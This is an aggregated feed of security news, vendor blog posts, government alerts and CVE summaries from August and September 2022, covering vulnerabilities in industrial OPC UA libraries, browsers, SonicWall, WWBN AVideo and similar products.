https://www.akamai.com/blog/security/akamai-named-a-2022-gartner-magic-quadrant-leader
The Gnutti Carlo Group Names Cato Networks 2021 Best Supplier in the Innovation Category
2022-09-06T06:00:00Z | 1662444000

Cato has received much praise and many industry awards from analysts over the years, but it’s our customers who know us the best. So, it’s especially gratifying to receive an award from a customer — the 2021 Best Supplier award in the Innovation Category from global manufacturer Gnutti Carlo Group. The award recognizes the high... The post The Gnutti Carlo Group Names Cato Networks 2021 Best Supplier in the Innovation Category appeared first on Cato Networks.

https://www.catonetworks.com/blog/gnutti-carlo-group-names-cato-2021-best-supplier-in-innovation/
CVE-2022-38138
2022-09-06T00:00:00Z | 1662422400

CWE-824: Access of Uninitialized Pointer The TMW IEC 61850 Library and TMW 60870-6 (ICCP/TASE.2) Library are vulnerable to access given to a small number of uninitialized pointers within their code. This could allow an attacker to target any client or server using the affected libraries to cause a denial-of-service condition. Successful exploitation of this vulnerability could lead to a denial-of-service condition to any server or client using the affected libraries.

https://claroty.com/team82/disclosure-dashboard/cve-2022-38138
High Threat Security Alert (A22-09-03): Vulnerability in Google Chrome
2022-09-05T04:00:00Z | 1662350400

Google released a security update to address a vulnerability in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A22-09-04): Vulnerability in Microsoft Edge (Chromium-based)
2022-09-05T04:00:00Z | 1662350400

Microsoft released a security update to address a vulnerability in Microsoft Edge (Chromium-based).

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-09-02): Multiple Vulnerabilities in Microsoft Edge (Chromium-based)
2022-09-02T04:00:00Z | 1662091200

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge (Chromium-based).

https://www.govcert.gov.hk/en/alerts_detail.php
15 Cybersecurity Experts To Follow on LinkedIn
2022-09-01T13:23:31Z | 1662038611

Our list of experts encompasses professionals and leaders who, together, deliver an overarching understanding of the Cybersecurity industry and the evolving nature of security threats. By following them, you can gain deep insights into cybersecurity’s latest developments and trends, deepen your understanding of the hacker mindset and get a glimpse into future predictions. As global... The post 15 Cybersecurity Experts To Follow on LinkedIn appeared first on Cato Networks.

https://www.catonetworks.com/blog/15-cybersecurity-experts-to-follow-on-linkedin/
Holiday Readiness, Part I: Best Practices for Maintaining Peak Performance
2022-09-01T13:00:00Z | 1662037200

Preparing for a post-pandemic holiday season means managing for peak application and system performance.

https://www.akamai.com/blog/performance/holiday-readiness,-part-I-best-practices-for-maintaining-peak-performance
RIA tegi riigikaitsekomisjonile ülevaate küberrünnetest
2022-09-01T06:00:00Z | 1662012000

Riigikaitsekomisjoni liikmed said tänasel erakorralisel istungil Kaitseministeeriumi asekantslerilt Tuuli Dunetonilt ülevaate Kaitseministeeriumi julgeolekuasutuste tegevusest. Riigi Infosüsteemi Ameti peadirektori asetäitja Gert Auväärt rääkis riigikogulastele Eestit tabanud küberrünnetest.

https://ria.ee/uudised/ria-tegi-riigikaitsekomisjonile-ulevaate-kuberrunnetest
High Threat Security Alert (A22-09-01): Vulnerability in Apple iOS and iPadOS
2022-09-01T04:00:00Z | 1662004800

Apple has released iOS 12.5.6 to fix the vulnerability in various Apple devices.

https://www.govcert.gov.hk/en/alerts_detail.php
CVE-2022-2848
2022-09-01T00:00:00Z | 1661990400

CWE-122 Heap-Based Buffer Overflow Specifically crafted OPC UA messages transmitted to the server could allow an attacker to crash the server and leak data.

https://claroty.com/team82/disclosure-dashboard/cve-2022-2848
CVE-2022-2825
2022-09-01T00:00:00Z | 1661990400

CWE-121 Stack-Based Buffer Overflow Specifically crafted OPC UA messages transmitted to the server could allow an attacker to crash the server and remotely execute code.

https://claroty.com/team82/disclosure-dashboard/cve-2022-2825
CVE-2022-1738
2022-09-01T00:00:00Z | 1661990400

CWE-125 Out-of-Bounds Read The affected product is vulnerable to an out-of-bounds read, which could allow an attacker to leak sensitive data from the process memory.

https://claroty.com/team82/disclosure-dashboard/cve-2022-1738
CVE-2022-1523
2022-09-01T00:00:00Z | 1661990400

CWE-123 Write-What-Where Condition The affected product is vulnerable to a write-what-where condition, which could allow an attacker to overwrite program memory to manipulate the flow of information.

https://claroty.com/team82/disclosure-dashboard/cve-2022-1523
Student Loan Breach Exposes 2.5M Records
2022-08-31T12:57:48Z | 1661950668

2.5 million people were affected, in a breach that could spell more trouble down the line.

https://threatpost.com/student-loan-breach-exposes-2-5m-records/180492/
Security Alert (A22-08-18): Multiple Vulnerabilities in Google Chrome
2022-08-31T04:00:00Z | 1661918400

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Watering Hole Attacks Push ScanBox Keylogger
2022-08-30T16:00:43Z | 1661875243

Researchers uncover a watering hole attack likely carried out by APT TA423, which attempts to plant the ScanBox JavaScript-based reconnaissance tool.

https://threatpost.com/watering-hole-attacks-push-scanbox-keylogger/180490/
IT Supply Chain Problems? Here’s How the Cloud Helps Get Around Them
2022-08-30T13:03:39Z | 1661864619

During an investor call in February 2022, Arista Network’s president and CEO Jayshree Ullal said that some of the lead times on its sales are 50-70 weeks out. Likewise, Cisco is facing extreme product delays. According to Cisco CFO Scott Heron, “The ongoing supply constraints not only impacted our ability to ship hardware, but also impacts our... The post IT Supply Chain Problems? Here’s How the Cloud Helps Get Around Them appeared first on Cato Networks.

https://www.catonetworks.com/blog/how-the-cloud-helps-get-around-it-supply-chain-problems/
Now Available on GitHub: Akamai CLI Utility v1.0 for Akamai Terraform
2022-08-30T13:00:00Z | 1661864400

With v0.9 of the Akamai CLI for Terraform, application development teams can build on infrastructure as code (IaC) and maintain rapid development without compromising security.

https://www.akamai.com/blog/security/now-available-on-github-akamai-cli-utility-for-akamai-terraform
Tentacles of ‘0ktapus’ Threat Group Victimize 130 Firms
2022-08-29T14:56:19Z | 1661784979

Over 130 companies tangled in sprawling phishing campaign that spoofed a multi-factor authentication system.

https://threatpost.com/0ktapus-victimize-130-firms/180487/
New Prolexic Partner Megaport Now Live in Australia
2022-08-29T13:00:00Z | 1661778000

As part of Akamai?s focus on serving local market needs, we are thrilled to announce new Prolexic connectivity options via Megaport Elastic Fabric in Australia.

https://www.akamai.com/blog/news/new-prolexic-partner-megaport-now-live-in-australia
Ransomware Attacks are on the Rise
2022-08-26T16:44:27Z | 1661532267

Lockbit is by far this summer’s most prolific ransomware group, trailed by two offshoots of the Conti group.

https://threatpost.com/ransomware-attacks-are-on-the-rise/180481/
International TLP protocol for sharing information updated – version 2.0 released
2022-08-26T13:29:18Z | 1661520558

The international Forum of Incident Response and Security Teams (FIRST) has released a new version of its Traffic Light Protocol (TLP) originally introduced in 2017. TLP was created to harmonise information sharing practices and to promote the sharing of information between national and international public and private operators.

https://www.kyberturvallisuuskeskus.fi/en/news/international-tlp-protocol-sharing-information-updated-version-20-released
International TLP protocol for sharing information updated – version 2.0 released
2022-08-26T13:29:18Z | 1661520558

The international Forum of Incident Response and Security Teams (FIRST) has released a new version of its Traffic Light Protocol (TLP) originally introduced in 2017. TLP was created to harmonise information sharing practices and to promote the sharing of information between national and international public and private operators.

https://www.kyberturvallisuuskeskus.fi/en/news/international-tlp-protocol-sharing-information-updated-version-20-released
Cybercriminals Are Selling Access to Chinese Surveillance Cameras
2022-08-25T18:47:15Z | 1661453235

Tens of thousands of cameras have failed to patch a critical, 11-month-old CVE, leaving thousands of organizations exposed.

https://threatpost.com/cybercriminals-are-selling-access-to-chinese-surveillance-cameras/180478/
Magnifier: An Experiment with Interactive Decompilation
2022-08-25T13:00:30Z | 1661432430

Today, we are releasing Magnifier, an experimental reverse engineering user interface I developed during my internship. Magnifier asks, “What if, as an alternative to taking handwritten notes, reverse engineering researchers could interactively reshape a decompiled program to reflect what they would normally record?” With Magnifier, the decompiled C code isn’t the end—it’s […]

https://blog.trailofbits.com/2022/08/25/magnifier-an-experiment-with-interactive-decompilation/
Akamai?s Insights on DNS in Q2 2022
2022-08-25T13:00:00Z | 1661432400

https://www.akamai.com/blog/security-research/q2-dns-akamai-insights
Mitigating Log4j Abuse Using Akamai Guardicore Segmentation
2022-08-25T13:00:00Z | 1661432400

Learn how Akamai Guardicore Segmentation can help you reveal vulnerable servers and applications, and stop exploitation.

https://www.akamai.com/blog/security/recommendations-for-log4j-mitigation
What?s New for Developers: August 2022
2022-08-25T13:00:00Z | 1661432400

This August?s developer update brings you some of the things we?ve been most excited to tell you about. We?re highlighting Terraform updates and more.

https://www.akamai.com/blog/developers/whats-new-for-developers-august-2022
The Sound of the Trombone
2022-08-25T12:39:36Z | 1661431176

I love Trombones… in marching bands. Some trombones, however, generate a totally different sound: sighs of angst across networking teams around the world. Why “The Trombone Effect” Is So Detrimental to IT Teams and End Users The “Trombone Effect” occurs in a network architecture that forces a distributed organization to use a single secure exit... The post The Sound of the Trombone appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-sound-of-the-trombone/
Sügisel toimuvad infoturbe halduse baaskoolitused E-ITSi rakendajatele
2022-08-25T06:00:00Z | 1661407200

Kohe algaval tarkusekuul on Eesti infoturbestandardi (E-ITS) rakendajatel võimalus osaleda infoturbe halduse baaskoolitusel. Kuupäevade valikus puudust ei tule ja koolitusel saab auditoorselt osaleda nii Tallinnas kui ka Tartus.

https://ria.ee/uudised/sugisel-toimuvad-infoturbe-halduse-baaskoolitused-e-itsi-rakendajatele
Security Alert (A22-08-17): Multiple Vulnerabilities in Cisco Products
2022-08-25T04:00:00Z | 1661400000

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
Apelo a Patrocinadores para a Team Europa
2022-08-25T00:00:00Z | 1661385600

A ENISA, em conjunto com outras organizações regionais e internacionais, lançou a iniciativa de organizar e acolher pela primeira vez o International Cybersecurity Challenge (ICC), realizado em Junho de 2022. O objetivo deste desafio é atrair jovens talentos e sensibilizar a comunidade, globalmente, para a educação e as competências necessárias na área da cibersegurança. As equipas competem numa série de desafios, tais como aplicação web e exploração de sistemas, criptografia, engenharia inversa, desafios de hardware e desafios de ataque/defesa. O sucesso da primeira edição do ICC deu um novo impulso à iniciativa. Assim, a 2ª edição do concurso será organizada pela Cybersecurity & Infrastructure Security Agency (CISA) nos Estados Unidos da América no final de Julho de 2023. A ENISA convida potenciais patrocinadores que estejam interessados em apoiar a participação da Team Europa na 2ª edição do International Cybersecurity Challenge. Os patrocinadores podem apoiar de várias formas, como por exemplo:- Formações à Team Europa;- Patrocínio dos media;- Cobertura das despesas de viagem e alojamento da equipa. Se estiver interessado em patrocinar ou saber mais sobre como apoiar a Team Europa, por favor contacte o CNCS através do seguinte e-mail: cncs@cncs.gov.pt .

https://dyn.cncs.gov.pt/pt/detalhe/art/135684/apelo-a-patrocinadores-para-a-team-europa
SMA100 Exposure of Sensitive Information to an Unauthorized Actor
2022-08-24T15:57:13Z | 1661356633

A vulnerability in the SonicWall SMA100 appliance could potentially expose sensitive information i.e., third-party packages and library versions used in the appliance firmware to a pre-authenticated actor.IMPORTANT: SMA 1000 series products are not affected by this vulnerability. CVE: None Last updated: Aug. 24, 2022, 3:57 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0020
SonicWall SMA100 Post-Auth Heap-based Buffer Overflow Vulnerability
2022-08-24T15:41:56Z | 1661355716

A Heap-based Buffer Overflow vulnerability in the SonicWall SMA100 appliance allows a remote authenticated attacker to cause Denial of Service (DoS) on the appliance or potentially lead to code execution. This vulnerability impacts 10.2.1.5-34sv and earlier versions.IMPORTANT: SMA 1000 series products are not affected by this vulnerability. CVE: CVE-2022-2915 Last updated: Aug. 24, 2022, 3:41 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0019
Twitter Whistleblower Complaint: The TL;DR Version
2022-08-24T14:17:04Z | 1661350624

Twitter is blasted for security and privacy lapses by the company’s former head of security who alleges the social media giant’s actions amount to a national security risk.

https://threatpost.com/twitter-whistleblower-tldr-version/180472/
Security Alert (A22-08-15): Multiple Vulnerabilities in Firefox
2022-08-24T04:00:00Z | 1661313600

Mozilla has published the advisories (MFSA2022-33, MFSA2022-34 and MFSA2022-35) to address multiple vulnerabilities in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-08-16): Vulnerability in VMware Products
2022-08-24T04:00:00Z | 1661313600

VMware has published a security advisory to address a vulnerability in VMware products.

https://www.govcert.gov.hk/en/alerts_detail.php
CVE-2022-33320
2022-08-24T00:00:00Z | 1661299200

CWE-502: Deserialization of Untrusted Data All ICONICS Suite and Mitsubishi Electric MC Works64 products contain a deserialization vulnerability that could enable malicious project configuration files to execute arbitrary code via XML code on the files.

https://claroty.com/team82/disclosure-dashboard/cve-2022-33320
CVE-2022-33317
2022-08-24T00:00:00Z | 1661299200

CWE-829: Inclusion of Functionality from Untrusted Control Sphere GraphWorX64 scripting, contained in all ICONICS Suite products and Mitsubishi Electric MC Works64 products, is based on JScript and .NET. It stores script code in the GraphWorX64 project files. These project files could be directly edited that could result in code execution if exploited.

https://claroty.com/team82/disclosure-dashboard/cve-2022-33317
CVE-2022-25903
2022-08-24T00:00:00Z | 1661299200

opcua is an OPC UA server / client API implementation for Rust. Affected versions of this package are vulnerable to Denial of Service (DoS) via the ExtensionObjects and Variants objects, when it allows unlimited nesting levels, which could result in a stack overflow even if the message size is less than the maximum allowed.

https://claroty.com/team82/disclosure-dashboard/cve-2022-25903
CVE-2022-24375
2022-08-24T00:00:00Z | 1661299200

Affected versions of this package are vulnerable to Denial of Service (DoS) when bypassing the limitations for excessive memory consumption by sending multiple CloseSession requests with the deleteSubscription parameter equal to False.

https://claroty.com/team82/disclosure-dashboard/cve-2022-24375
CVE-2022-1748
2022-08-24T00:00:00Z | 1661299200

CWE-476: NULL Pointer Dereference The application crashes after several OPC UA methods have been called and the OPC UA session is closed before the methods have been finished.

https://claroty.com/team82/disclosure-dashboard/cve-2022-1748
Firewall Bug Under Active Attack Triggers CISA Warning
2022-08-23T13:19:58Z | 1661260798

CISA is warning that Palo Alto Networks’ PAN-OS is under active attack and needs to be patched ASAP.

https://threatpost.com/firewall-bug-under-active-attack-cisa-warning/180467/
Inside SASE: GigaOm Review of 20 Vendors Finds Platforms Are Far and Few
2022-08-23T11:30:00Z | 1661254200

Since the inception of SASE, there’s been a remarkable amount of breast-beating over the number of features offered by SASE solutions.   That is a mistake. SASE innovation has always been about the convergence of security and networking capabilities into a cloud service. The core capabilities of SASE are not new. Their convergence in appliances isn’t... The post Inside SASE: GigaOm Review of 20 Vendors Finds Platforms Are Far and Few appeared first on Cato Networks.

https://www.catonetworks.com/blog/gigaom-review-of-20-vendors-finds-platforms-are-far-and-few/
RIA pakub ühekordse sisselogimise lahendust riigi e-teenustele
2022-08-23T06:00:00Z | 1661234400

Riigi Infosüsteemi Amet (RIA) koos arendusettevõttega Nortal lõi avalikule sektorile keskse seansihaldusega autentimisteenuse, mis tagab e-teenustesse ühekordse sisse- ja väljalogimise (SSO ehk single sign-on).

https://ria.ee/uudised/ria-pakub-uhekordse-sisselogimise-lahendust-riigi-e-teenustele
CVE-2022-25888
2022-08-23T00:00:00Z | 1661212800

opcua is an OPC UA server / client API implementation for Rust. Affected versions of this package are vulnerable to Denial of Service (DoS) due to a missing limitation on the number of received chunks - per single session or in total for all concurrent sessions. An attacker can exploit this vulnerability by sending an unlimited number of huge chunks (e.g. 2GB each) without sending the Final closing chunk.

https://claroty.com/team82/disclosure-dashboard/cve-2022-25888
CVE-2022-25761
2022-08-23T00:00:00Z | 1661212800

Affected versions of this package are vulnerable to Denial of Service (DoS) due to a missing limitation on the number of received chunks - per single session or in total for all concurrent sessions. An attacker can exploit this vulnerability by sending an unlimited number of huge chunks (e.g. 2GB each) without sending the Final closing chunk.

https://claroty.com/team82/disclosure-dashboard/cve-2022-25761
CVE-2022-25304
2022-08-23T00:00:00Z | 1661212800

Affected versions of this package are vulnerable to Denial of Service (DoS) due to a missing limitation on the number of received chunks - per single session or in total for all concurrent sessions. An attacker can exploit this vulnerability by sending an unlimited number of huge chunks (e.g. 2GB each) without sending the Final closing chunk.

https://claroty.com/team82/disclosure-dashboard/cve-2022-25304
CVE-2022-25302
2022-08-23T00:00:00Z | 1661212800

Affected versions of this package are vulnerable to Denial of Service (DoS) due to a missing handler for failed casting when unvalidated data is forwarded to boost::get function in OpcUaNodeIdBase.h. Exploiting this vulnerability is possible when sending a specifically crafted OPC UA message with a special encoded NodeId.

https://claroty.com/team82/disclosure-dashboard/cve-2022-25302
CVE-2022-25231
2022-08-23T00:00:00Z | 1661212800

Affected versions of this package are vulnerable to Denial of Service (DoS) by sending a specifically crafted OPC UA message with a special OPC UA NodeID, when the requested memory allocation exceeds the v8’s memory limit.

https://claroty.com/team82/disclosure-dashboard/cve-2022-25231
CVE-2022-24381
2022-08-23T00:00:00Z | 1661212800

Affected versions of this package are vulnerable to Denial of Service (DoS) due to a missing limitation on the number of received chunks - per single session or in total for all concurrent sessions. An attacker can exploit this vulnerability by sending an unlimited number of huge chunks (e.g. 2GB each) without sending the Final closing chunk.

https://claroty.com/team82/disclosure-dashboard/cve-2022-24381
CVE-2022-21208
2022-08-23T00:00:00Z | 1661212800

Affected versions of this package are vulnerable to Denial of Service (DoS) due to a missing limitation on the number of received chunks - per single session or in total for all concurrent sessions. An attacker can exploit this vulnerability by sending an unlimited number of huge chunks (e.g. 2GB each) without sending the Final closing chunk.

https://claroty.com/team82/disclosure-dashboard/cve-2022-21208
Fake Reservation Links Prey on Weary Travelers
2022-08-22T13:59:06Z | 1661176746

Fake travel reservations are exacting more pain from the travel weary, already dealing with the misery of canceled flights and overbooked hotels.

https://threatpost.com/reservation-links-prey-on-travelers/180462/
GigaOm’s Evaluation Guide for Technology Decision Makers
2022-08-22T13:31:00Z | 1661175060

The post GigaOm’s Evaluation Guide for Technology Decision Makers appeared first on Cato Networks.

https://www.catonetworks.com/resources/gigaoms-evaluation-guide-for-technology-decision-makers/
Security Alert (A22-08-14): Multiple Vulnerabilities in Microsoft Edge (Chromium-based)
2022-08-22T04:00:00Z | 1661140800

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge (Chromium-based).

https://www.govcert.gov.hk/en/alerts_detail.php
CVE-2022-24298
2022-08-22T00:00:00Z | 1661126400

Affected versions of this package are vulnerable to Denial of Service (DoS) when bypassing the limitations for excessive memory consumption by sending multiple CloseSession requests with the deleteSubscription parameter equal to False.

https://claroty.com/team82/disclosure-dashboard/cve-2022-24298
iPhone Users Urged to Update to Patch 2 Zero-Days
2022-08-19T15:25:56Z | 1660922756

Separate fixes to macOS and iOS patch respective flaws in the kernel and WebKit that can allow threat actors to take over devices and are under attack.

https://threatpost.com/iphone-users-urged-to-update-to-patch-2-zero-days-under-attack/180448/
Meet Jessica Scherlag: Senior Manager of Social Media and Engagement
2022-08-19T13:00:00Z | 1660914000

Jessica Scherlag discusses the importance of social media platforms, her unconventional career path, and the benefits of pushing past your comfort zone.

https://www.akamai.com/blog/culture/meet-jessica-scherlag-senior-manager-social-media-engagement
16. ja 17. augusti ummistusrünnakute sihtmärke oli paarkümmend
2022-08-19T06:00:00Z | 1660888800

Riigi infosüsteemi ameti küberintsidentide käsitlemise osakonna (CERT-EE) sõnul prooviti ummistusrünnakutega häirida paarikümne riigiasutuse ja ettevõte veebilehekülje kasutamist. Rünnakute mõjul oli paari veebilehe töö mõnda aega häiritud.

https://ria.ee/uudised/16-ja-17-augusti-ummistusrunnakute-sihtmarke-oli-paarkummend
CVE-2022-2793
2022-08-19T00:00:00Z | 1660867200

CWE-353: Missing Support for Integrity Check Proficy Machine Edition Version 9.00 and prior has no authentication or authorization of data packets after establishing a connection for the SRTP protocol.

https://claroty.com/team82/disclosure-dashboard/cve-2022-2793
CVE-2022-2792
2022-08-19T00:00:00Z | 1660867200

CWE-284: Improper Access Control Proficy Machine Edition Version 9.00 and prior stores project data in a directory with improper access control lists.

https://claroty.com/team82/disclosure-dashboard/cve-2022-2792
CVE-2022-2791
2022-08-19T00:00:00Z | 1660867200

CWE-434: Unrestricted Upload of File with Dangerous File Type Proficy Machine Edition Version 9.00 and prior will upload any file written into the PLC logic folder to the connected PLC.

https://claroty.com/team82/disclosure-dashboard/cve-2022-2791
CVE-2022-2790
2022-08-19T00:00:00Z | 1660867200

CWE-347: Improper Verification of Cryptographic Signature Proficy Machine Edition Version 9.00 and prior does not properly verify compiled logic (PDT files) and data blocks data (BLD/BLK files).

https://claroty.com/team82/disclosure-dashboard/cve-2022-2790
CVE-2022-2789
2022-08-19T00:00:00Z | 1660867200

CWE-345: Insufficient Verification of Data Authenticity Proficy Machine Edition Version 9.00 and prior can display logic that is different than the compiled logic.

https://claroty.com/team82/disclosure-dashboard/cve-2022-2789
CVE-2022-2788
2022-08-19T00:00:00Z | 1660867200

CWE-29: Path Traversal Proficy Machine Edition Version 9.80 and prior is vulnerable to a ZipSlip attack through an upload procedure which enables attackers to implant a malicious .BLZ file on the PLC. The file can transfer through the engineering station onto Windows in a way that executes the malicious code. Read Team82’s report: “Evil PLC Attack: Using a Controller as Predator Rather than Prey”

https://claroty.com/team82/disclosure-dashboard/cve-2022-2788
Google Patches Chrome’s Fifth Zero-Day of the Year
2022-08-18T14:31:38Z | 1660833098

An insufficient validation input flaw, one of 11 patched in an update this week, could allow for arbitrary code execution and is under active attack.

https://threatpost.com/google-patches-chromes-fifth-zero-day-of-the-year/180432/
Cato SASE Cloud: Enjoy Simplified Configuration and Centralized, Global Policy Delivery
2022-08-18T12:00:21Z | 1660824021

In this article, we will discuss some of the various policy objects that exist within the Cato Management Application and how they are used. You may be familiar with the concept of localized versus centralized policies that exist within legacy SD-WAN architectures, but Cato’s cloud-native SASE architecture simplifies configuration and policy delivery across all capabilities... The post Cato SASE Cloud: Enjoy Simplified Configuration and Centralized, Global Policy Delivery appeared first on Cato Networks.

https://www.catonetworks.com/blog/cato-sase-cloud-simplified-configuration-and-centralized-global-policy-delivery/
Cyber weather in July: no major changes
2022-08-18T10:39:22Z | 1660819162

The Finnish News Agency STT and Wärtsilä had their systems hacked and became victims of ransomware. These events were widely reported in the media. Scam and phishing messages are being actively circulated with the current theme of tax refunds. The German standardisation organisation TÜV SÜD introduced a label similar to Traficom’s Cybersecurity Label.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa_07/2022
Cyber weather in July: no major changes
2022-08-18T10:39:22Z | 1660819162

The Finnish News Agency STT and Wärtsilä had their systems hacked and became victims of ransomware. These events were widely reported in the media. Scam and phishing messages are being actively circulated with the current theme of tax refunds. The German standardisation organisation TÜV SÜD introduced a label similar to Traficom’s Cybersecurity Label.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa_07/2022
High Threat Security Alert (A22-08-11): Multiple Vulnerabilities in Apple iOS and iPadOS
2022-08-18T04:00:00Z | 1660795200

Apple has released iOS 15.6.1 and iPadOS 15.6.1 to fix the vulnerabilities in various Apple devices.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A22-08-12): Vulnerability in Microsoft Edge (Chromium-based)
2022-08-18T04:00:00Z | 1660795200

Microsoft released a security update to address a vulnerability in Microsoft Edge (Chromium-based).

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-08-13): Vulnerability in Cisco Products
2022-08-18T04:00:00Z | 1660795200

Cisco released a security advisory to address the vulnerability in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
Identificação de Potenciais Prestadores de Serviços na Área da Cibersegurança
2022-08-18T00:00:00Z | 1660780800

A ENISA – Agência Europeia para a Cibersegurança publicou o procedimento do concurso (referência ENISA F-OCU-22-T31) para a identificação de potenciais prestadores de serviços na área da cibersegurança nos Estados-Membros.Os interessados poderão encontrar toda a documentação relativa ao procedimento do concurso em https://www.enisa.europa.eu/procurement/supporting-enisa-for-the-provision-of-services-under-the-cybersecurity-support-action . A submissão de propostas poderá ser feita até ao dia 3 de outubro de 2022 [18:00 (CEST) Central European Summer Time].

https://dyn.cncs.gov.pt/pt/detalhe/art/135683/identificacao-de-potenciais-prestadores-de-servicos-na-area-da-ciberseguranca
Using mutants to improve Slither
2022-08-17T13:00:12Z | 1660741212

Improving static analysis tools can be hard; once you’ve implemented a good tool based on a useful representation of a program and added a large number of rules to detect problems, how do you further enhance the tool’s bug-finding power? One (necessary) approach to coming up with new rules […]

https://blog.trailofbits.com/2022/08/17/using-mutants-to-improve-slither/
Deploying Akamai MFA at Scale: 6 Lessons Learned
2022-08-17T13:00:00Z | 1660741200

Planning a multi-factor authentication (MFA) rollout? Take a look at the six lessons we learned when we deployed Akamai MFA.

https://www.akamai.com/blog/security/6-lessons-learned-deploying-akamai-mfa-at-scale
Tax refunds are here and criminals try to their hands on the money
2022-08-17T11:50:34Z | 1660737034

The Finnish Tax Administration has begun making tax refund payments. Like many taxpayers, scammers are also looking forward to the refunds, hoping to get their share of the money. This means this means another wave of scam messages.

https://www.kyberturvallisuuskeskus.fi/en/ttn_08082022
Tax refunds are here and criminals try to their hands on the money
2022-08-17T11:50:34Z | 1660737034

The Finnish Tax Administration has begun making tax refund payments. Like many taxpayers, scammers are also looking forward to the refunds, hoping to get their share of the money. This means this means another wave of scam messages.

https://www.kyberturvallisuuskeskus.fi/en/ttn_08082022
Denial-of-service attacks are common in Finland
2022-08-17T11:46:41Z | 1660736801

Each year, more than 10,000 denial-of-service attacks (DoS) are made against the websites and online services of organisations in Finland. This means that DoS attacks are being made and blocked each day across the country.

https://www.kyberturvallisuuskeskus.fi/en/news/denial-service-attacks-are-common-finland
Denial-of-service attacks are common in Finland
2022-08-17T11:46:41Z | 1660736801

Each year, more than 10,000 denial-of-service attacks (DoS) are made against the websites and online services of organisations in Finland. This means that DoS attacks are being made and blocked each day across the country.

https://www.kyberturvallisuuskeskus.fi/en/news/denial-service-attacks-are-common-finland
High Threat Security Alert (A22-08-10): Multiple Vulnerabilities in Google Chrome
2022-08-17T04:00:00Z | 1660708800

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Microsoft Azure Sphere /proc/fdt mmap operation out-of-bounds read vulnerability
2022-08-17T00:00:00Z | 1660694400

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1497
Cato 2022 Mid-Year Survey Result Summary
2022-08-16T12:09:20Z | 1660651760

SD-WAN, SASE, & SSE are becoming mainstream, but confusion hasn’t left the building. Yet. What survey are you talking about? Twice a year, Cato Networks runs a global survey that collects and analyzes the state of enterprise networking and security. Our last survey has broken all records with 3129 respondents from across the globe. More... The post Cato 2022 Mid-Year Survey Result Summary appeared first on Cato Networks.

https://www.catonetworks.com/blog/cato-2022-mid-year-survey-result-summary/
WWBN AVideo all cross-site request forgery (csrf) vulnerability
2022-08-16T00:00:00Z | 1660608000

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1534
WWBN AVideo aVideoEncoder wget OS command injection vulnerability
2022-08-16T00:00:00Z | 1660608000

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1548
WWBN AVideo password hash improper authentication vulnerability
2022-08-16T00:00:00Z | 1660608000

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1545
WWBN AVideo ObjectYPT SQL injection vulnerability
2022-08-16T00:00:00Z | 1660608000

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1551
Microsoft DirectComposition GetWeakReferenceBase null pointer dereference vulnerability
2022-08-16T00:00:00Z | 1660608000

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1515
WWBN AVideo videoAddNew cross-site scripting (XSS) vulnerability
2022-08-16T00:00:00Z | 1660608000

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1540
HDF5 Group libhdf5 gif2h5 out-of-bounds write vulnerability
2022-08-16T00:00:00Z | 1660608000

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1485
WWBN AVideo footer alerts cross-site scripting (XSS) vulnerability
2022-08-16T00:00:00Z | 1660608000

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1538
WWBN AVideo image403 cross-site scripting (XSS) vulnerability
2022-08-16T00:00:00Z | 1660608000

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1539
WWBN AVideo charts tab selection cross-site scripting (XSS) vulnerability
2022-08-16T00:00:00Z | 1660608000

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1537
WWBN AVideo cookie information disclosure vulnerability
2022-08-16T00:00:00Z | 1660608000

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1542
WWBN AVideo aVideoEncoderReceiveImage information disclosure vulnerability
2022-08-16T00:00:00Z | 1660608000

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1549
WWBN AVideo aVideoEncoder unzipDirectory directory traversal vulnerability
2022-08-16T00:00:00Z | 1660608000

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1547
WWBN AVideo objects id handling authentication bypass vulnerability
2022-08-16T00:00:00Z | 1660608000

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1536
HDF5 Group libhdf5 gif2h5 out-of-bounds read vulnerability
2022-08-16T00:00:00Z | 1660608000

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1486
HDF5 Group libhdf5 gif2h5 heap-based buffer overflow vulnerability
2022-08-16T00:00:00Z | 1660608000

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1487
WWBN AVideo chunkFile information disclosure vulnerability
2022-08-16T00:00:00Z | 1660608000

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1550
Microsoft DirectComposition CCompositionSurfaceBitmapMarshaler null pointer dereference vulnerability
2022-08-16T00:00:00Z | 1660608000

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1514
WWBN AVideo session id privilege escalation vulnerability
2022-08-16T00:00:00Z | 1660608000

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1535
